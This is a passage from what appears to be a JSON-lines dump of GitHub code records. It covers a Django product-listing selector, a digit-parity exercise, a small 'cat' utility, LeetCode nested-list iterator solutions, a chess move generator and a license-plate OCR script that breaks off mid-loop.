for material in product.materials.all()\n ],\n rooms=[RoomDetailRecord.from_room(room) for room in product.rooms.all()],\n colors=[\n ColorDetailRecord(id=color.id, name=color.name, color_hex=color.color_hex)\n for color in product.colors.all()\n ],\n shapes=[\n ShapeDetailRecord(\n id=shape.id,\n name=shape.name,\n image_url=shape.image.url if shape.image else None,\n )\n for shape in product.shapes.all()\n ],\n files=[\n ProductFileRecord(\n id=file.id,\n product_id=file.product_id,\n name=file.name,\n file=file.file.url if file.file else None,\n )\n for file in product.files.all()\n ],\n images=[\n BaseHeaderImageRecord.from_model(model=image)\n for image in product.images.all()\n ],\n options=options,\n )\n\n return record\n\n\ndef product_list_for_sale_for_qs(\n *,\n products: BaseQuerySet[\"Product\"] | None,\n filters: ProductListFilters | dict[str, Any] | None,\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products based on given queryset. The\n ProductListRecord is a record of mutual properties for use whenever we\n show a list of products frontend.\n \"\"\"\n\n filters = filters or {}\n\n if products is not None:\n qs = products.preload_for_list().order_by(\"-created_at\") # type: ignore\n\n else:\n qs = Product.objects.available().preload_for_list().order_by(\"-created_at\") # type: ignore # pylint: disable=line-too-long\n\n filtered_qs = ProductSearchFilter(filters, qs).qs\n\n return [product_list_record(product=product) for product in filtered_qs]\n\n\ndef product_list(\n *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products.\n \"\"\"\n\n products = Product.objects.all()\n\n return product_list_for_sale_for_qs(products=products, filters=filters)\n\n\ndef product_list_for_sale(\n *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products for sale.\n \"\"\"\n\n products = Product.objects.available()\n\n return product_list_for_sale_for_qs(products=products, filters=filters)\n\n\ndef _product_list_for_sale_cache_key(\n *, filters: ProductListFilters | dict[str, Any] | None\n) -> str:\n return f\"products.for_sale.filters={filters}\"\n\n\n@cached(key=_product_list_for_sale_cache_key, timeout=5 * 60)\ndef product_list_for_sale_from_cache(\n *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products for sale from cache.\n \"\"\"\n\n return product_list_for_sale(filters=filters)\n\n\ndef product_list_by_category(\n *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products belonging to the given category.\n \"\"\"\n\n products_by_category = Product.objects.by_category(category)\n\n return product_list_for_sale_for_qs(products=products_by_category, filters=filters)\n\n\ndef _product_list_by_category_cache_key(\n *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> str:\n return f\"products.category_id={category.id}.filters={filters}\"\n\n\n@cached(key=_product_list_by_category_cache_key, timeout=5 * 60)\ndef product_list_by_category_from_cache(\n *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n \"\"\"\n Returns a filterable list of products belonging to the given category\n from cache.\n \"\"\"\n\n return product_list_by_category(category=category, filters=filters)\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/products/selectors/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13101896052","text":"def digito_par(num, pares = 0):\r\n centena = num // 100\r\n dezena = (num % 100) // 10\r\n unidade = (num % 100) % 10\r\n if centena % 2 == 0:\r\n pares += 1\r\n if dezena % 2 == 0:\r\n pares += 1\r\n if unidade % 2 == 0:\r\n pares += 1\r\n return f'O número {num} tem {pares} dígitos pares'\r\n\r\ndef main():\r\n numero = int(input('Informe um número entre 100 e 999: ').strip())\r\n print(digito_par(numero))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ernestopi/PEC-SEM07-T02","sub_path":"SEM07-T02-Q02.py","file_name":"SEM07-T02-Q02.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16234546316","text":"import sys\nimport fileinput\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('files', nargs = '*', help = 'specify input files')\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-o', '--output', \n help = 'specify the output file. The default is stdout')\n group.add_argument('-i', '--inplace', action = 'store_true',\n help = 'modify files inplace')\n args = parser.parse_args()\n\n if args.output and args.output != '-':\n output_file = open(args.output, 'w')\n else:\n output_file = sys.stdout\n\n # write lines \n for line in fileinput.input(args.files, inplace=args.inplace):\n output_file.write(line)\n \n # close file explicitely\n if args.output and args.output != '-':\n output_file.close()\n\n\n","repo_name":"gongbudaizhe/bilib","sub_path":"utils/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834340840","text":"# 341. Flatten Nested List Iterator Add to List\n# DescriptionSubmissionsSolutions\n# Total Accepted: 32604\n# Total Submissions: 81167\n# Difficulty: Medium\n# Contributor: LeetCode\n# Given a nested list of integers, implement an iterator to flatten it.\n# \n# Each element is either an integer, or a list -- whose elements may also be integers or other lists.\n# \n# Example 1:\n# Given the list [[1,1],2,[1,1]],\n# \n# By calling next repeatedly until hasNext returns false, the order of elements returned by next should be: [1,1,2,1,1].\n# \n# Example 2:\n# Given the list [1,[4,[6]]],\n# \n# By calling next repeatedly until hasNext returns false, the order of elements returned by next should be: [1,4,6].\n# \n\n# \"\"\"\n# This is the interface that allows for creating nested lists.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger(object):\n# def isInteger(self):\n# \"\"\"\n# @return True if this NestedInteger holds a single integer, rather than a nested list.\n# :rtype bool\n# \"\"\"\n#\n# def getInteger(self):\n# \"\"\"\n# @return the single integer that this NestedInteger holds, if it holds a single integer\n# Return None if this NestedInteger holds a nested list\n# :rtype int\n# \"\"\"\n#\n# def getList(self):\n# \"\"\"\n# @return the nested list that this NestedInteger holds, if it holds a nested list\n# Return None if this NestedInteger holds a single integer\n# :rtype List[NestedInteger]\n# \"\"\"\n\n# 2018.11.23\n# self wrote\n# Use self.L and self.index to keep track of the current Integer\n# To find out next,\n# First, self.index += 1\n# if self.index is pointing to a list, keep looping and adding the current L, index + 1 into stack\n# if self.index == len(self.L), pop from stack and find out the next\n\nclass NestedIterator(object):\n\n def __init__(self, nestedList):\n \"\"\"\n Initialize your data structure here.\n :type nestedList: List[NestedInteger]\n \"\"\"\n self.stack = []\n self.L = nestedList\n self.index = 0\n self.findNext() # Stop at next INT\n \n \n\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n res = self.L[self.index].getInteger()\n # print(\"NEXT : \", res)\n self.index += 1\n self.findNext()\n return res\n \n\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n return True if self.L else False\n \n def findNext(self):\n # print(\"findNext : \", self.L, self.index)\n if not self.L and not self.stack:\n return\n \n while self.stack or self.index <= len(self.L):\n if self.index == len(self.L):\n if self.stack:\n self.L, self.index = self.stack.pop()\n else:\n self.L = []\n else:\n if self.L[self.index].isInteger():\n return\n else:\n self.stack.append([self.L, self.index + 1])\n self.L = self.L[self.index].getList()\n self.index = 0\n return \n\n\n# 2018.02.25 One stack solution\n# First reversely push to stack\n# hasNext() to find next available element\n# Not a good answer because hasNext is not idempotent\n\nfrom collections import deque\nclass NestedIterator(object):\n\n def __init__(self, nestedList):\n \"\"\"\n Initialize your data structure here.\n :type nestedList: List[NestedInteger]\n \"\"\"\n self.d = deque()\n for i in xrange(len(nestedList) - 1, -1, -1):\n self.d.append(nestedList[i])\n \n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.d.pop().getInteger()\n \n\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n d = self.d\n #print(\"hasNext\", self.d)\n while d:\n if d[-1].isInteger(): \n return True\n cur = d.pop().getList()\n for i in xrange(len(cur) - 1, -1, -1):\n d.append(cur[i])\n return False\n \n\n# 2017.05.13 Stack\nfrom collections import deque\nclass NestedIterator(object):\n\n def __init__(self, nestedList):\n \"\"\"\n Initialize your data structure here.\n :type nestedList: List[NestedInteger]\n \"\"\"\n self.s = [nestedList, 0]\n\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if not self.hasNext(): return \"ERROR\"\n nestedList, i = self.s[-1]\n self.s[-1][1] += 1\n return nestedList[i].getInteger()\n \n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n s = self.s\n while s:\n nestedList, i = s[-1]\n if i == len(nestedList):\n s.pop()\n else:\n x = nestedList[i]\n if x.getInterger(): return True\n s[-1][1] += 1\n s.append([x.getList(), 0])\n return False\n\n# Your NestedIterator object will be instantiated and called as such:\n# i, v = NestedIterator(nestedList), []\n# while i.hasNext(): v.append(i.next())\n","repo_name":"yihanc/LC","sub_path":"PY/341_flatten_nested_list_iterator.py","file_name":"341_flatten_nested_list_iterator.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4421408628","text":"import copy\n\nclass Game_of_Chess:\n\n def __init__(self):\n self.turn = True #czyja jest tura\n self.move_counter = 0 #ile ruchów zostąło wykonanych\n self.enpassant = -1 #pole, które można bić w przelocie.\n self.castle = [True,True] #czy król białych i czarnych się ruszył\n self.board = [\"o\" for i in range(64)] #ustawienie bierek na szachownicy\n self.white=[] #pola na których stoją białe bierki\n self.black=[] #pola na których stoją czarne bierki\n self.kings = [-1,-1] #pola na których stoją króle\n self.kings_attacked=[False,False] #czy król danego kolru jest w szachu\n \n def fill_board(self):\n \"ustawia bierki w startowej pozycji\"\n fen=\"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR\"\n i=0\n for x in fen:\n if x==\"/\":continue\n elif ord(x)<=57 and ord(x)>=48: \n for j in range(ord(x)-48):\n self.board[i]=\"o\"\n i+=1\n \n else :\n self.board[i]=x\n if x.isupper(): \n self.white.append(i)\n if x==\"K\": self.kings[0]=i\n else: \n self.black.append(i)\n if x==\"k\":self.kings[1]=i\n i+=1\n self.kings_attacked = self.is_square_controlled(self.kings[0],False),self.is_square_controlled(self.kings[1],True)\n \n def get_moves_unsafeking(self,i,turn):\n \"zwraca dostępne ruchy dla figury z danego pola nie biorąc pod uwagę bezpieczeństwa króla. Turn informuje czyja jest tura.\"\n \n def get_rook_moves(i,color):\n \"Zwraca ruchy dla wieży koloru color\"\n x =i%8\n y =i//8\n moves=[]\n squares = []\n squares.append([(j,y) for j in range(x+1,8)])\n squares.append([(j,y) for j in range(x-1,-1,-1)])\n squares.append([(x,j) for j in range(y+1,8)])\n squares.append([(x,j) for j in range(y-1,-1,-1)])\n\n for lines in squares:\n for sq in lines:\n if self.board[sq[0]+8*sq[1]]==\"o\": moves.append(sq[0]+8*sq[1])\n else : \n if self.board[sq[0]+8*sq[1]].isupper()!=color : moves.append(sq[0]+8*sq[1])\n break\n return moves \n def get_bishop_moves(i,color):\n \"Zwraca ruchy dla gońca koloru color\" \n x = i%8\n y = i//8\n moves = []\n squares = []\n squares.append([(x+i,y+i) for i in range(1,8) if x+i<8 and y+i<8])\n squares.append([(x-i,y-i) for i in range(1,8) if x-i>=0 and y-i>=0])\n squares.append([(x+i,y-i) for i in range(1,8) if x+i<8 and y-i>=0])\n squares.append([(x-i,y+i) for i in range(1,8) if x-i>=0 and y+i<8])\n for lines in squares:\n for sq in lines:\n if self.board[sq[0]+8*sq[1]]==\"o\": moves.append(sq[0]+8*sq[1])\n else : \n if self.board[sq[0]+8*sq[1]].isupper()!=color : moves.append(sq[0]+8*sq[1])\n break\n return moves \n def get_queen_moves(i,color):\n \"Zwraca ruchy dla królowej koloru color\"\n moves = get_bishop_moves(i,color)+get_rook_moves(i,color)\n return moves\n def get_knight_moves(i,color):\n \"Zwraca ruchy dla skoczka koloru color\" \n x = i%8\n y = i//8\n moves = []\n squares = []\n squares.extend([(x+2,y+1),(x+2,y-1),(x-2,y+1),(x-2,y-1),(x+1,y+2),(x+1,y-2),(x-1,y+2),(x-1,y-2)])\n for sq in squares[:]:\n if sq[0] in range(8) and sq[1] in range(8):\n if self.board[sq[0]+sq[1]*8]==\"o\": moves.append(sq[0]+8*sq[1])\n elif self.board[sq[0]+sq[1]*8].isupper()!=color: moves.append(sq[0]+8*sq[1])\n return moves\n\n def get_king_moves(i,color):\n \"Zwraca ruchy dla króla koloru color\" \n x = i%8\n y = i//8\n moves = []\n squares = []\n squares.extend([(x+1,y+1),(x+1,y),(x+1,y-1),(x-1,y+1),(x-1,y),(x-1,y-1),(x,y+1),(x,y-1)])\n for sq in squares[:]:\n if sq[0] in range(8) and sq[1] in range(8):\n if self.board[sq[0]+sq[1]*8]==\"o\": moves.append(sq[0]+8*sq[1])\n elif self.board[sq[0]+sq[1]*8].isupper()!=color: moves.append(sq[0]+8*sq[1])\n \n return moves\n def get_pawn_moves(i,color):\n \"Zwraca ruchy dla pionka koloru color\"\n x = i%8\n y = i//8\n moves=[]\n if color:\n if self.board[i-8]==\"o\": \n moves.append(i-8)\n if y==6 and self.board[i-16]==\"o\": moves.append(i-16)\n if x+1 in range(8) and (self.board[i-7]!=\"o\" and not self.board[i-7].isupper()) or (i-7 == self.enpassant): moves.append(i-7)\n if x-1 in range(8) and (self.board[i-9]!=\"o\" and not self.board[i-9].isupper()) or (i-9 == self.enpassant): moves.append(i-9)\n else:\n if self.board[i+8]==\"o\": \n moves.append(i+8)\n if y==1 and self.board[i+16]==\"o\": moves.append(i+16)\n if x+1 in range(8) and ( (self.board[i+9]!=\"o\" and self.board[i+9].isupper()) or (i+9 == self.enpassant) ): moves.append(i+9)\n if x-1 in range(8) and ( (self.board[i+7]!=\"o\" and self.board[i+7].isupper()) or (i+7 == self.enpassant) ): moves.append(i+7)\n return moves\n moves=[]\n if self.board[i] != \"o\" and self.board[i].isupper() == turn:\n if self.board[i]==\"r\" or self.board[i]==\"R\": moves=get_rook_moves(i,turn)\n if self.board[i]==\"b\" or self.board[i]==\"B\": moves=get_bishop_moves(i,turn)\n if self.board[i]==\"n\" or self.board[i]==\"N\": moves=get_knight_moves(i,turn)\n if self.board[i]==\"q\" or self.board[i]==\"Q\": moves=get_queen_moves(i,turn)\n if self.board[i]==\"k\" or self.board[i]==\"K\": moves=get_king_moves(i,turn)\n if self.board[i]==\"p\" or self.board[i]==\"P\": moves=get_pawn_moves(i,turn)\n return moves\n def is_square_controlled(self,i,color):\n \"zwraca prawdę, jesli dane pole jest atakowane przez bierki koloru color\"\n if color: squares =self.white\n else: squares = self.black\n for sq in squares:\n if self.board[sq]==\"p\":\n if sq%8>0 and sq+7==i: return True\n if sq%8<7 and sq+9==i: return True\n elif self.board[sq]==\"P\":\n if sq%8>0 and sq-9==i: return True\n if sq%8<7 and sq-7==i: return True\n else:\n if i in self.get_moves_unsafeking(sq,color): return True\n return False\n\n def move_piece(self,i,j):\n \"przesuwa bierkę z pola i do pola j. Zakładamy, że wiemy już, że to jest poprawny ruch\"\n self.turn = not self.turn\n self.move_counter+=1\n if (self.board[i] ==\"p\" or self.board[i] ==\"P\") and (abs(i-j)==16): self.enpassant=int((i+j)/2)\n else : self.enpassant = -1\n if self.board[i] ==\"k\" : \n self.castle[1]=False\n self.kings[1]=j\n if self.board[i] ==\"K\" : \n self.castle[0]=False\n self.kings[0]=j\n if self.board[i].isupper(): \n self.white.remove(i)\n self.white.append(j)\n if j in self.black : self.black.remove(j)\n else:\n self.black.remove(i)\n self.black.append(j)\n if j in self.white : self.white.remove(j) \n \n self.board[j]=self.board[i]\n self.board[i]=\"o\"\n self.kings_attacked = self.is_square_controlled(self.kings[0],False),self.is_square_controlled(self.kings[1],True)\n \n def get_moves(self,i):\n \"zwraca dostępne ruchy dla figury z danego pola biorąc pod uwagę bezpieczeństwo króla. Turn informuje czyja jest tura. \"\n turn = self.turn\n if i==-1: return []\n moves = self.get_moves_unsafeking(i,turn)\n for sq in moves[:]:\n gra = copy.deepcopy(self)\n gra.move_piece(i,sq)\n if self.turn : king_square = gra.kings[0]\n else : king_square=gra.kings[1]\n if gra.is_square_controlled(king_square,not turn): moves.remove(sq)\n return moves\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"szymji99/Chess","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19883652362","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 25 20:1 7:29 2022\r\n\r\n@author: Alfonso Blanco\r\n\"\"\"\r\n\r\nimport pytesseract\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\n######################################################################\r\n# PARAMETERS\r\n######################################################################\r\ndirname = \"test2\\\\images\"\r\ndirname_labels = \"test2\\\\labels\"\r\ndirname_licenses=\"TrueLicenses.txt\"\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\nbias=4.3\r\n\r\n\r\nX_resize=220\r\nY_resize=70\r\n\r\n\r\nIncthreshold=1.0\r\n\r\nContLoopMax=400\r\n######################################################################\r\n\r\nimport os\r\nimport re\r\n\r\nimport imutils\r\n#####################################################################\r\n\"\"\"\r\nCopied from https://gist.github.com/endolith/334196bac1cac45a4893#\r\n\r\nother source:\r\n https://stackoverflow.com/questions/46084476/radon-transformation-in-python\r\n\"\"\"\r\n\r\n\r\n\r\nfrom skimage.transform import radon\r\n\r\nimport numpy\r\nfrom numpy import mean, array, blackman, sqrt, square\r\nfrom numpy.fft import rfft\r\n\r\n\r\n\r\ntry:\r\n # More accurate peak finding from\r\n # https://gist.github.com/endolith/255291#file-parabolic-py\r\n from parabolic import parabolic\r\n\r\n def argmax(x):\r\n return parabolic(x, numpy.argmax(x))[0]\r\nexcept ImportError:\r\n from numpy import argmax\r\n\r\n\r\ndef GetRotationImage(image):\r\n \r\n \r\n I=image\r\n I = I - mean(I) # Demean; make the brightness extend above and below zero\r\n \r\n \r\n # Do the radon transform and display the result\r\n sinogram = radon(I)\r\n \r\n \r\n # Find the RMS value of each row and find \"busiest\" rotation,\r\n # where the transform is lined up perfectly with the alternating dark\r\n # text and white lines\r\n \r\n # rms_flat does no exist in recent versions\r\n #r = array([mlab.rms_flat(line) for line in sinogram.transpose()])\r\n r = array([sqrt(mean(square(line))) for line in sinogram.transpose()])\r\n rotation = argmax(r)\r\n #print('Rotation: {:.2f} degrees'.format(90 - rotation))\r\n #plt.axhline(rotation, color='r')\r\n \r\n # Plot the busy row\r\n row = sinogram[:, rotation]\r\n N = len(row)\r\n \r\n # Take spectrum of busy row and find line spacing\r\n window = blackman(N)\r\n spectrum = rfft(row * window)\r\n \r\n frequency = argmax(abs(spectrum))\r\n \r\n return rotation, spectrum, frequency\r\n#####################################################################\r\n\r\n#########################################################################\r\ndef loadimages (dirname ):\r\n#########################################################################\r\n# adapted from:\r\n# https://www.aprendemachinelearning.com/clasificacion-de-imagenes-en-python/\r\n# by Alfonso Blanco García\r\n######################################################################## \r\n imgpath = dirname + \"\\\\\"\r\n \r\n images = []\r\n \r\n \r\n print(\"Reading imagenes from \",imgpath)\r\n NumImage=-2\r\n \r\n \r\n for root, dirnames, filenames in os.walk(imgpath):\r\n \r\n \r\n NumImage=NumImage+1\r\n \r\n for filename in filenames:\r\n \r\n if re.search(\"\\.(jpg|jpeg|png|bmp|tiff)$\", filename):\r\n \r\n filepath = os.path.join(root, filename)\r\n \r\n image = cv2.imread(filepath)\r\n #https://stackoverflow.com/questions/51823228/get-orientation-pytesseract-python3\r\n #https://stackoverflow.com/questions/54047116/getting-an-error-when-using-the-image-to-osd-method-with-pytesseract\r\n #https://stackoverflow.com/users/5617608/esraa-abdelmaksoud\r\n #print(pytesseract.image_to_osd(Image.open(filepath), lang='eng', config='--psm 0 -c min_characters_to_try=5'))\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n \r\n images.append(gray)\r\n \r\n \r\n return images\r\n #########################################################################\r\ndef loadlabels (dirname ):\r\n #########################################################################\r\n \r\n ######################################################################## \r\n lblpath = dirname + \"\\\\\"\r\n \r\n labels = []\r\n \r\n \r\n print(\"Reading labels from \",lblpath)\r\n \r\n \r\n \r\n for root, dirnames, filenames in os.walk(lblpath):\r\n \r\n \r\n for filename in filenames:\r\n \r\n if re.search(\"\\.(txt)$\", filename):\r\n \r\n filepath = os.path.join(root, filename)\r\n \r\n f=open(filepath,\"r\")\r\n\r\n Conta=0\r\n for linea in f:\r\n \r\n lineadelTrain =linea.split(\" \")\r\n if lineadelTrain[0] == \"0\":\r\n Conta=Conta+1\r\n labels.append(linea)\r\n break\r\n f.close() \r\n if Conta==0:\r\n print(\"Rare labels without tag 0 on \" + filename )\r\n \r\n \r\n \r\n return labels\r\n \r\ndef loadTrueLicenses (dirname ): \r\n f=open(dirname)\r\n licenses=[]\r\n Conta=0;\r\n for linea in f:\r\n # quitar el cr\r\n linea1=linea[0:len(linea)-1]\r\n licenses.append(linea1)\r\n Conta=Conta+1\r\n f.close() \r\n return licenses \r\n\r\n##########################################3\r\n# Bubble sort in Python\r\n#https://www.programiz.com/dsa/bubble-sort\r\ndef bubbleSort(array1,array2):\r\n \r\n # loop to access each array element\r\n for i in range(len(array1)):\r\n\r\n # loop to compare array elements\r\n for j in range(0, len(array1) - i - 1):\r\n\r\n # compare two adjacent elements\r\n # change > to < to sort in descending order\r\n if array1[j] < array1[j + 1]:\r\n\r\n # swapping elements if elements\r\n # are not in the intended order\r\n temp = array1[j]\r\n temp2= array2[j]\r\n array1[j] = array1[j+1]\r\n array2[j] = array2[j+1]\r\n array1[j+1] = temp\r\n array2[j+1] = temp2 \r\n###########################################################\r\n# MAIN\r\n##########################################################\r\n\r\nimages=loadimages(dirname)\r\n\r\nlabels=loadlabels(dirname_labels)\r\n\r\nTrueLicenses=loadTrueLicenses(dirname_licenses)\r\n\r\nprint(\"Number of imagenes : \" + str(len(images)))\r\nprint(\"Number of labels : \" + str(len(labels)))\r\nprint(\"Number of true licenses : \" + str(len(TrueLicenses)))\r\n\r\nTotHits=0\r\nTotDetect=0\r\nTotDetectBad=0\r\nTotNoDetect=0\r\n\r\n\r\nNumberImageOrder=0\r\n\r\nfor i in range (len(images)):\r\n \r\n NumberImageOrder=NumberImageOrder+1\r\n \r\n lineaLabel =labels[i].split(\" \")\r\n \r\n # Meaning of fields in files labels\r\n #https://github.com/ultralytics/yolov5/issues/2293\r\n #\r\n x_center=float(lineaLabel[1])\r\n y_center=float(lineaLabel[2])\r\n width=float(lineaLabel[3])\r\n heigh=float(lineaLabel[4])\r\n \r\n \r\n \r\n \r\n x_start= x_center - width*0.5\r\n x_end=x_center + width*0.5\r\n \r\n y_start= y_center - heigh*0.5\r\n y_end=y_center + heigh*0.5\r\n \r\n X_start=int(x_start*416)\r\n X_end=int(x_end*416)\r\n \r\n Y_start=int(y_start*416)\r\n Y_end=int(y_end*416)\r\n \r\n \r\n \r\n # Clipping the boxes in two positions helps\r\n # in license plate reading\r\n X_start=X_start + 3 \r\n \r\n Y_start=Y_start + 2\r\n \r\n \r\n \r\n image=images[i]\r\n \r\n cv2.imshow(\"Test \", image)\r\n \r\n cv2.waitKey()\r\n \r\n SwEnd=0\r\n \r\n SumBrightness=np.sum(image)\r\n Desv=np.std(image)\r\n if Desv < 45:\r\n print(\"Image with low standard deviation, will be difficult to be recognized\")\r\n #print(\"Car\" + str(NumberImageOrder) + \" Brillo : \" +str(SumBrightness) + \r\n # \" Desviacion : \" + str(Desv))\r\n threshold=(SumBrightness/177529.84) + bias\r\n print(\"SumBrightness = \" + str(SumBrightness) + \" Desviacion = \" + str(Desv)) \r\n #print(\" threshold \" + str(threshold))\r\n gray=image[Y_start:Y_end, X_start:X_end]\r\n \r\n \r\n gray=cv2.resize(gray,None,fx=1.78,fy=1.78,interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.resize(gray, (X_resize,Y_resize), interpolation = cv2.INTER_AREA)\r\n \r\n SumBrightnessLic=np.sum(gray)\r\n DesvLic=np.std(gray)\r\n #print(\"Car\" + str(NumberImageOrder) + \" Brillo : \" +str(SumBrightnessLic) + \r\n # \" Desviacion : \" + str(DesvLic))\r\n \r\n Conta=0\r\n ContLoop=0\r\n SwEnd=0\r\n Llicenses=[]\r\n \r\n while (ContLoop < ContLoopMax):\r\n \r\n if ContLoop >ContLoopMax: break\r\n ContLoop=ContLoop+1\r\n \r\n rotation, spectrum, frquency =GetRotationImage(gray)\r\n rotation=90 - rotation\r\n \r\n #print(\"Car\" + str(NumberImageOrder) + \" Brillo : \" +str(SumBrightnessLic) + \r\n # \" Desviacion : \" + str(DesvLic))\r\n \r\n if rotation !=0 and rotation !=90:\r\n #print(\"SE ROTA LA IMAGEN \" + str(rotation) + \" GRADOS\")\r\n gray=imutils.rotate(gray,angle=rotation)\r\n \r\n \r\n #https://java2blog.com/cv2-threshold-python/\r\n #https://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html\r\n \r\n #https://aicha-fatrah.medium.com/improve-the-quality-of-your-ocr-information-extraction-ebc93d905ac4\r\n \r\n \r\n ret, gray1=cv2.threshold(gray,threshold,255, cv2.THRESH_BINARY)\r\n \r\n #cv2.imshow(\"Prueba\", gray1)\r\n #cv2.waitKey()\r\n \r\n \r\n text = pytesseract.image_to_string(gray1, lang='eng', \\\r\n config='--psm 13 --oem 3') \r\n text = ''.join(char for char in text if char.isalnum())\r\n \r\n \r\n Confidence=\"\"\r\n Case=0\r\n \r\n # Special case with an extra digit in the first position and\r\n # 7 positions plus case 1063HFG\r\n if len(text) > 7:\r\n text=text[1:8]\r\n \r\n \r\n if len(text) > 6:\r\n #\r\n # Case de licencia formed by NNNNNNN 7 numeric digits\r\n #\r\n if (text[0] >= \"0\" and text[0] <= \"9\"\r\n and text[1] >= \"0\" and text[1] <= \"9\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and text[3] >= \"0\" and text[3] <= \"9\"\r\n and (( text[4] >= \"0\" and text[4] <= \"9\") or text[4] == \" \")\r\n and (( text[5] >= \"0\" and text[5] <= \"9\") or text[5] == \" \")\r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n \r\n Case=1\r\n else:\r\n # \r\n # Case of license plate format AAANNAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"0\" and text[4] <= \"9\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=2\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=3\r\n else:\r\n # \r\n # Case of license plate format AAAANNN\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and ((text[3] >= \"A\" and text[3] <= \"Z\"))\r\n and text[4] >= \"0\" and text[4] <= \"9\" \r\n \r\n and text[5] >= \"0\" and text[5] <= \"9\"\r\n and text[6] >= \"0\" and text[6] <= \"9\"):\r\n #and text[7] >= \"0\" and text[7] <= \"Z\"):\r\n Case=4\r\n else:\r\n # \r\n # Case of license plate format AAANAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"A\" and text[2] <= \"Z\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=5\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"A\" and text[0] <= \"Z\") )\r\n and text[1] >= \"A\" and text[1] <= \"Z\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=6\r\n else:\r\n # \r\n # Case of license plate format AANNAAA\r\n #\r\n if (((text[0] >= \"0\" and text[0] <= \"9\") )\r\n and text[1] >= \"0\" and text[1] <= \"9\"\r\n and text[2] >= \"0\" and text[2] <= \"9\"\r\n and ((text[3] >= \"0\" and text[3] <= \"9\"))\r\n and text[4] >= \"A\" and text[4] <= \"Z\" \r\n \r\n and text[5] >= \"A\" and text[5] <= \"Z\"\r\n and text[6] >= \"A\" and text[6] <= \"Z\"):\r\n \r\n Case=7\r\n else:\r\n # \r\n # Case of license plate format AANNNN pero que se ha colado\r\n # un caracter en la primera posicion\r\n if (((text[1] >= \"A\" and text[1] <= \"Z\") )\r\n and 